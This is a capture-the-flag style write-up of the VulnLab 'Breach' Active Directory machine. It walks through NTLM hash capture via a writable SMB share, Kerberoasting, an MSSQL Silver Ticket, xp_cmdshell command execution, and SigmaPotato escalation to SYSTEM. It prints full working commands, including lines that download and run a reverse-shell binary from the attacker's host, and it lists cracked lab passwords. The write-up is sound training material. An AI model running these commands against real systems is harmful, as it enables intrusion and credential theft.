VulnLab: Breach

Overview

Breach is an Active Directory machine that demonstrates how write access to an SMB share can be abused to capture NTLMv2 authentication, leading to Kerberoasting, MSSQL Silver Ticket abuse, command execution through xp_cmdshell, and final escalation through SeImpersonatePrivilege.

Attack Chain

• Enumerate exposed services and identify the breach.vl domain
• Use netexec RID brute forcing to build a user list
• Discover a writable SMB share as Guest
• Upload ntlm_theft payloads to trigger outbound authentication
• Capture and crack Julia.Wong’s NTLMv2 hash
• Kerberoast svc_mssql and crack the service account password
• Generate a Silver Ticket for the MSSQL service
• Authenticate to MSSQL as Administrator using Kerberos
• Enable xp_cmdshell and gain command execution as svc_mssql
• Catch a reverse shell and read the local flag
• Abuse SeImpersonatePrivilege with SigmaPotato
• Gain NT AUTHORITY\SYSTEM and read the root flag

Enumeration

Port Scanning

We start by defining the target and running a full TCP port scan to identify the exposed services.

export IP=10.10.110.194; export NAME=BREACH; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -A -oA scans/nmap_initial_$NAME -v

The open TCP ports are:

53,80,135,139,445,3269,3389,5985,49664,49667,49670,51702

Findings

The exposed services indicate a Windows Active Directory target. DNS (53), SMB (139, 445), the Global Catalog over SSL on 3269, RDP (3389), and WinRM (5985) are available. The scan also identifies the domain as breach.vl and the domain controller as breachdc.breach.vl.

The domain and host are added to /etc/hosts for reliable name resolution.

echo "$IP breach.vl breachdc.breach.vl" | sudo tee -a /etc/hosts

Web Enumeration

Default IIS Page

Browsing to port 80 shows the default IIS landing page.

There is nothing immediately useful on the web service, so the focus shifts to SMB.

SMB Enumeration

RID Brute Force

With SMB exposed, we first try to enumerate domain users through RID brute forcing with netexec while authenticating as Guest with a blank password.

nxc smb $IP -u 'Guest' -p '' -d breach.vl --rid-brute | grep -i "sidtypeuser"

This returns several domain users.

The output is cleaned into a simple username list for later spraying and authentication testing.

cat creds/users_netexec.txt | awk -F'\\\\' '{print $2}' | awk '{print $1}' > creds/users_verified.txt

Testing the usernames as passwords does not return any valid credentials, so we continue with share enumeration.

nxc smb $IP -u 'Guest' -p '' -d breach.vl --shares

The share share stands out because Guest has write access.

Writable Share

We connect to the share with smbclient.

smbclient //$IP/share --user='Guest' --password=''

Inside the share, the transfer directory is accessible. The user directories are not readable, but the writable location gives us a useful attack path.

Writable SMB shares can often be abused by placing files that trigger outbound authentication when viewed or indexed by a user. Instead of trying to upload a reverse shell directly, we can attempt to capture NTLMv2 hashes.

Foothold

NTLM Capture with ntlm_theft

For the hash capture attempt, we use ntlm_theft, which generates multiple common file types that reference an attacker-controlled SMB listener.

https://github.com/Greenwolf/ntlm_theft

python3 ~/Tools/ntlm_theft/ntlm_theft.py -g all -s 10.8.6.99 -f malConfig

The tool generates several payload files.

Next, Responder is started in analysis mode to listen for incoming authentication attempts.

sudo responder -I tun0 -A

Back in smbclient, we upload the generated files into the writable share/transfer location. The .scf file does not produce a response, but the .lnk file triggers an authentication attempt almost immediately.

Responder captures an NTLMv2 hash for Julia.Wong.

The hash is saved locally for cracking.

john --wordlist=/usr/share/wordlists/rockyou.txt creds/julia_wong_ntlm.hash

The password is recovered successfully.

Julia.Wong:Computer1

Password Reuse Check

The recovered password is sprayed against the verified user list to check for reuse.

nxc smb $IP -u creds/users_verified.txt -p 'Computer1' -d breach.vl --continue-on-success

Only Julia.Wong validates with this password.

Kerberoasting svc_mssql

With valid domain credentials, we check for Kerberoastable accounts using impacket-GetUserSPNs.

impacket-GetUserSPNs -dc-ip $IP breach.vl/Julia.Wong:Computer1 -request

The request returns a krb5tgs hash for svc_mssql.

The hash is saved locally.

Then it is cracked with john.

john --wordlist=/usr/share/wordlists/rockyou.txt creds/svc_mssql.hash

The recovered service account credentials are:

svc_mssql:Trustno1

The credentials are tested with netexec. The account validates over SMB, RDP, and MSSQL, but it does not immediately provide a shell.

Active Directory Enumeration

BloodHound Collection

Since we have valid credentials but no obvious shell access, we collect Active Directory data with bloodhound-python.

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -ns $IP -dc breachdc.breach.vl -c All --zip

The same collection is run with the svc_mssql account.

bloodhound-python -d breach.vl -u 'svc_mssql' -p 'Trustno1' -ns $IP -dc breachdc.breach.vl -c All --zip

BloodHound does not reveal an obvious privilege escalation path. Since svc_mssql is tied to MSSQL and the service is accessible, the next path is to forge a service ticket for MSSQL.

MSSQL Silver Ticket

Required Values

To forge a Silver Ticket for the MSSQL service, we need three values:

• The NT hash of the service account password
• The domain SID
• The target SPN

Because we want to access the MSSQL service from our attacking machine, impacket-ticketer is used to generate a Kerberos service ticket.

Service Account NT Hash

First, we generate the NT hash for the svc_mssql password, Trustno1.

echo -n "Trustno1" | iconv -t UTF-16LE | openssl md4

69596c7aa1e8daee17f8e78870e25a5c

Domain SID

The domain SID is retrieved over LDAP with netexec.

nxc ldap $IP -u 'svc_mssql' -p 'Trustno1' -d breach.vl -k --get-sid

S-1-5-21-2330692793-3312915120-706255856

MSSQL SPN

The target SPN can be retrieved with impacket-GetUserSPNs without the -request flag.

impacket-GetUserSPNs -dc-ip $IP breach.vl/Julia.Wong:Computer1

MSSQLSvc/breachdc.breach.vl:1433

Generating the Silver Ticket

With the NT hash, domain SID, domain name, and SPN, we forge a service ticket as Administrator.

impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c \
  -domain-sid S-1-5-21-2330692793-3312915120-706255856 \
  -domain breach.vl \
  -spn MSSQLSvc/breachdc.breach.vl:1433 \
  Administrator

The ticket is generated as Administrator.ccache.

The ticket is loaded into the current environment and checked with klist.

export KRB5CCNAME=./Administrator.ccache
klist

Kerberos configuration also needs to resolve the domain and KDC correctly. Update or create /etc/krb5.conf with the required realm and host details.

MSSQL Access as Administrator

Using the forged Kerberos ticket, we authenticate to MSSQL as Administrator.

impacket-mssqlclient -k -no-pass breach.vl/Administrator@breachdc.breach.vl -windows-auth

The connection succeeds.

We check whether the session has sysadmin privileges.

select IS_SRVROLEMEMBER ('sysadmin')

The query returns True.

Enabling xp_cmdshell

With sysadmin privileges, xp_cmdshell can be enabled.

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell whoami;

Commands execute as svc_mssql.

Reverse Shell as svc_mssql

A listener is started on the attacking machine with rlwrap and nc on port 443. Then rcat is transferred to C:\ProgramData through xp_cmdshell.

xp_cmdshell powershell -c iwr -uri http://10.8.6.99/rcat.exe -Outfile c:\ProgramData\rcat_10.8.6.99_443.exe

We confirm that the payload was written successfully.

xp_cmdshell cmd /c dir c:\ProgramData

The payload is executed through xp_cmdshell.

xp_cmdshell cmd /c c:\ProgramData\rcat_10.8.6.99_443.exe

A shell is received as svc_mssql.

The local flag can now be read.

type C:\Users\svc_mssql\Desktop\local.txt

Privilege Escalation

Privilege Enumeration

From the svc_mssql shell, we inspect the assigned privileges.

whoami /priv

SeManageVolumePrivilege and SeImpersonatePrivilege are enabled.

SeImpersonatePrivilege gives us a path to escalate with a Potato-style exploit. In this case, SigmaPotato is used.

https://github.com/tylerdotrar/SigmaPotato/releases

SigmaPotato

Transfer SigmaPotato.exe to the target.

iwr -uri http://10.8.6.99/SigmaPotato.exe -Outfile c:\ProgramData\SigmaPotato.exe

We test command execution first with whoami.

cmd /c c:\ProgramData\SigmaPotato.exe whoami

The command runs as nt authority\system.

SYSTEM Shell

A new listener is started on port 443, and the same rcat payload is executed through SigmaPotato.

cmd /c c:\ProgramData\SigmaPotato.exe "cmd /c c:\ProgramData\rcat_10.8.6.99_443.exe"

This returns a shell as NT AUTHORITY\SYSTEM.

The root flag can now be read.

type C:\Users\Administrator\Desktop\root.txt

Key Takeaways

Breach shows how a seemingly low-impact writable SMB share can become the start of a full compromise chain. By placing files that trigger outbound authentication, we captured and cracked a user’s NTLMv2 hash, then used those credentials to Kerberoast svc_mssql. The MSSQL service account enabled a Silver Ticket attack, which provided administrative MSSQL access and command execution through xp_cmdshell. The final escalation came from SeImpersonatePrivilege, allowing SigmaPotato to execute commands as NT AUTHORITY\SYSTEM.